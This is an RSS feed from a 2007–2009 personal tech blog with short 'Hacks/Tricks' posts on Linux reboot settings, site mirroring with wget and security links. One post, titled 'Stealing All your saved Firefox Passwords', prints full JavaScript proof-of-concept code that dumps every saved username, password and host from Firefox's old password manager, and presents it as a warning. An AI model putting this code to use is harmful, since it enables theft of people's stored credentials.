<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>CaZaTech &#187; Hacks/Tricks</title>
	<atom:link href="http://cazatech.wordpress.com/category/hackstricks/feed/" rel="self" type="application/rss+xml" />
	<link>http://cazatech.wordpress.com</link>
	<description>My favourite hacks, about OS, gadgets and other tech stuff</description>
	<lastBuildDate>Fri, 01 May 2009 18:10:58 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='cazatech.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/e5c4fac45681188a3133f18419838c7c?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>CaZaTech &#187; Hacks/Tricks</title>
		<link>http://cazatech.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://cazatech.wordpress.com/osd.xml" title="CaZaTech" />
		<item>
		<title>Preventing ctrol+alt+del rebooting in our machine</title>
		<link>http://cazatech.wordpress.com/2009/05/01/preventing-ctrolaltdel-rebooting-in-our-machine/</link>
		<comments>http://cazatech.wordpress.com/2009/05/01/preventing-ctrolaltdel-rebooting-in-our-machine/#comments</comments>
		<pubDate>Fri, 01 May 2009 12:37:02 +0000</pubDate>
		<dc:creator>cazatech</dc:creator>
				<category><![CDATA[Hacks/Tricks]]></category>
		<category><![CDATA[UNIX]]></category>

		<guid isPermaLink="false">http://cazatech.wordpress.com/?p=70</guid>
		<description><![CDATA[Edit the /etc/inittab file as root
There&#8217;s a line like this in the file

ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now
Just comment it, or replace it with something like this
ca:12345:ctrlaltdel:echo "Use the "shutdown -r now" command if you want to reboot the system"
Also you should read the shutdown manual. This is a part of this that I think is [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=70&subd=cazatech&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Edit the /etc/inittab file as root</p>
<p>There&#8217;s a line like this in the file<br />
<code><br />
ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now</code></p>
<p>Just comment it, or replace it with something like this<br />
<code>ca:12345:ctrlaltdel:echo "Use the "shutdown -r now" command if you want to reboot the system"</code></p>
<p>Also you should read the shutdown manual. This is a part of this that I think is important if we want to lock the rebooting system.<br />
<em>ACCESS CONTROL<br />
shutdown can be called from init(8) when the magic keys CTRL-ALT-DEL are pressed, by creating an appro-<br />
priate  entry in /etc/inittab. This means that everyone who has physical access to the console keyboard<br />
can shut the system down. To prevent this, shutdown can check to see if an authorized user is logged in<br />
on  one of the virtual consoles. If shutdown is called with the -a argument (add this to the invocation<br />
of shutdown in /etc/inittab), it checks to see if the file /etc/shutdown.allow  is  present.   It  then<br />
compares  the  login names in that file with the list of people that are logged in on a virtual console<br />
(from /var/run/utmp). Only if one of those authorized users or root is logged in, it will proceed. Oth-<br />
erwise it will write the message</em></p>
<p><em> shutdown: no authorized users logged in</em></p>
<p><em> to  the  (physical)  system console. The format of /etc/shutdown.allow is one user name per line. Empty<br />
lines and comment lines (prefixed by a #) are allowed. Currently there is a limit of 32 users  in  this<br />
file.</em></p>
<p>In some distros like Fedora, you must look for the <em>/etc/event.d/control-alt-delete</em> file to modify this event</p>
<p>Cheers</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/cazatech.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/cazatech.wordpress.com/70/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/cazatech.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/cazatech.wordpress.com/70/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/cazatech.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/cazatech.wordpress.com/70/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/cazatech.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/cazatech.wordpress.com/70/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/cazatech.wordpress.com/70/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/cazatech.wordpress.com/70/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=70&subd=cazatech&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://cazatech.wordpress.com/2009/05/01/preventing-ctrolaltdel-rebooting-in-our-machine/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e23d67b729a4d4ed2566eba58606ac05?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">cazatech</media:title>
		</media:content>
	</item>
		<item>
		<title>NSA security documents</title>
		<link>http://cazatech.wordpress.com/2007/12/13/nsa-security-documents/</link>
		<comments>http://cazatech.wordpress.com/2007/12/13/nsa-security-documents/#comments</comments>
		<pubDate>Thu, 13 Dec 2007 23:17:17 +0000</pubDate>
		<dc:creator>cazatech</dc:creator>
				<category><![CDATA[Hacks/Tricks]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://cazatech.wordpress.com/2007/12/13/nsa-security-documents/</guid>
		<description><![CDATA[Hey, i founded a webpage full of NSA (National Security Agency) security documents of many security topics like Windows XP, Cisco IOS and much more.
http://www.quands.cat/wp/2007/12/11/guies-de-configuracio-de-seguretat-de-la-nsa/ 
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=44&subd=cazatech&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Hey, i founded a webpage full of NSA (National Security Agency) security documents of many security topics like Windows XP, Cisco IOS and much more.</p>
<p><a href="http://www.quands.cat/wp/2007/12/11/guies-de-configuracio-de-seguretat-de-la-nsa/" target="_blank">http://www.quands.cat/wp/2007/12/11/guies-de-configuracio-de-seguretat-de-la-nsa/ </a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/cazatech.wordpress.com/44/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/cazatech.wordpress.com/44/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/cazatech.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/cazatech.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/cazatech.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/cazatech.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/cazatech.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/cazatech.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/cazatech.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/cazatech.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/cazatech.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/cazatech.wordpress.com/44/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=44&subd=cazatech&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://cazatech.wordpress.com/2007/12/13/nsa-security-documents/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e23d67b729a4d4ed2566eba58606ac05?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">cazatech</media:title>
		</media:content>
	</item>
		<item>
		<title>Stealing All your saved Firefox Passwords</title>
		<link>http://cazatech.wordpress.com/2007/10/23/stealing-all-your-saved-firefox-passwords/</link>
		<comments>http://cazatech.wordpress.com/2007/10/23/stealing-all-your-saved-firefox-passwords/#comments</comments>
		<pubDate>Tue, 23 Oct 2007 18:16:08 +0000</pubDate>
		<dc:creator>cazatech</dc:creator>
				<category><![CDATA[Hacks/Tricks]]></category>

		<guid isPermaLink="false">http://cazatech.wordpress.com/2007/10/23/stealing-all-your-saved-firefox-passwords/</guid>
		<description><![CDATA[We&#8217;ve to have care when we save our passwords. All of this are easy to recover (or steal!) with this simply function:
function listPW() {
if(document.location !='http://www.0x000000.com/hacks/hello.html') {
netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');
var pm = Components.classes["@mozilla.org/passwordmanager;1"].getService();
pm = pm.QueryInterface(Components.interfaces.nsIPasswordManager);
var enumerator = pm.enumerator;
document.writeln('Mozilla\'s idea of security, I do not store these passwords, it\'s only a PoC');
document.writeln('
');
while (enumerator.hasMoreElements()) {
try {
var np = enumerator.getNext();
np = np.QueryInterface(Components.interfaces.nsIPassword);
presult [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=38&subd=cazatech&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>We&#8217;ve to have care when we save our passwords. All of this are easy to recover (or steal!) with this simply function:</p>
<p><code>function listPW() {<br />
if(document.location !='http://www.0x000000.com/hacks/hello.html') {<br />
netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');<br />
var pm = Components.classes["@mozilla.org/passwordmanager;1"].getService();<br />
pm = pm.QueryInterface(Components.interfaces.nsIPasswordManager);<br />
var enumerator = pm.enumerator;<br />
document.writeln('Mozilla\'s idea of security, I do not store these passwords, it\'s only a PoC');<br />
document.writeln('<br />
');<br />
while (enumerator.hasMoreElements()) {<br />
try {<br />
var np = enumerator.getNext();<br />
np = np.QueryInterface(Components.interfaces.nsIPassword);<br />
presult = '['+np.user+'] ['+np.password+'] ['+np.host+']<br />
';<br />
document.writeln(presult);<br />
} catch(e) { }<br />
}<br />
} else { alert('this only runs from your PC, save the page to your desktop (CTRL+S) and open it in Firefox, then watch the Magicx!'); }<br />
}<br />
</code><br />
Be careful <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Source: <a href="http://www.0x000000.com/index.php?i=345&amp;bin=101011001">http://www.0&#215;000000.com/index.php?i=345&amp;bin=101011001 </a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/cazatech.wordpress.com/38/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/cazatech.wordpress.com/38/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/cazatech.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/cazatech.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/cazatech.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/cazatech.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/cazatech.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/cazatech.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/cazatech.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/cazatech.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/cazatech.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/cazatech.wordpress.com/38/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=38&subd=cazatech&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://cazatech.wordpress.com/2007/10/23/stealing-all-your-saved-firefox-passwords/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e23d67b729a4d4ed2566eba58606ac05?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">cazatech</media:title>
		</media:content>
	</item>
		<item>
		<title>Downloading a entire web site</title>
		<link>http://cazatech.wordpress.com/2007/10/09/downloading-a-entire-web-site/</link>
		<comments>http://cazatech.wordpress.com/2007/10/09/downloading-a-entire-web-site/#comments</comments>
		<pubDate>Tue, 09 Oct 2007 22:26:38 +0000</pubDate>
		<dc:creator>cazatech</dc:creator>
				<category><![CDATA[Hacks/Tricks]]></category>
		<category><![CDATA[UNIX]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://cazatech.wordpress.com/2007/10/09/downloading-a-entire-web-site/</guid>
		<description><![CDATA[If we need to save a entire website in our drive, we can choose some applications like:

HTTrack (Avaible for Windows and Linux)
Webcopier
In Linux type in a terminal: wget -r --level=3 http://www.url.com/

*&#8211;level=3 means that 3 sub-levels of the web will be downloaded.
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=37&subd=cazatech&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>If we need to save a entire website in our drive, we can choose some applications like:</p>
<ul>
<li><a href="http://www.httrack.com/page/2/en/index.html">HTTrack </a>(Avaible for Windows and Linux)</li>
<li><a href="http://www.maximumsoft.com/">Webcopier</a></li>
<li>In Linux type in a terminal: <code>wget -r --level=3 http://www.url.com/</code></li>
</ul>
<p>*&#8211;level=3 means that 3 sub-levels of the web will be downloaded.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/cazatech.wordpress.com/37/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/cazatech.wordpress.com/37/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/cazatech.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/cazatech.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/cazatech.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/cazatech.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/cazatech.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/cazatech.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/cazatech.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/cazatech.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/cazatech.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/cazatech.wordpress.com/37/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=37&subd=cazatech&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://cazatech.wordpress.com/2007/10/09/downloading-a-entire-web-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e23d67b729a4d4ed2566eba58606ac05?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">cazatech</media:title>
		</media:content>
	</item>
		<item>
		<title>Interesting hacking videos</title>
		<link>http://cazatech.wordpress.com/2007/07/07/interesting-hacking-videos/</link>
		<comments>http://cazatech.wordpress.com/2007/07/07/interesting-hacking-videos/#comments</comments>
		<pubDate>Sat, 07 Jul 2007 13:00:07 +0000</pubDate>
		<dc:creator>cazatech</dc:creator>
				<category><![CDATA[Hacks/Tricks]]></category>
		<category><![CDATA[Links]]></category>

		<guid isPermaLink="false">http://cazatech.wordpress.com/2007/07/07/interesting-hacking-videos/</guid>
		<description><![CDATA[I founded this webpage yesterday, have some videos about tricks of networking, OS, etc
http://www.irongeek.com/i.php?page=security/hackingillustrated 
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=23&subd=cazatech&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>I founded this webpage yesterday, have some videos about tricks of networking, OS, etc</p>
<p><a href="http://www.irongeek.com/i.php?page=security/hackingillustrated" target="_blank">http://www.irongeek.com/i.php?page=security/hackingillustrated </a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/cazatech.wordpress.com/23/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/cazatech.wordpress.com/23/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/cazatech.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/cazatech.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/cazatech.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/cazatech.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/cazatech.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/cazatech.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/cazatech.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/cazatech.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/cazatech.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/cazatech.wordpress.com/23/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=cazatech.wordpress.com&blog=1258290&post=23&subd=cazatech&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://cazatech.wordpress.com/2007/07/07/interesting-hacking-videos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e23d67b729a4d4ed2566eba58606ac05?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">cazatech</media:title>
		</media:content>
	</item>
	</channel>
</rss>